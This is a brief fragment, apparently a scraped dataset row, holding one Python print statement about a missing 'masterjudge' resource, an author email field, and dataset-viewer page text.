print('Non existing resource (problem, masterjudge), details available in the message: ' + str(e))
| [
"lewon.robert@gmail.com"
] | lewon.robert@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.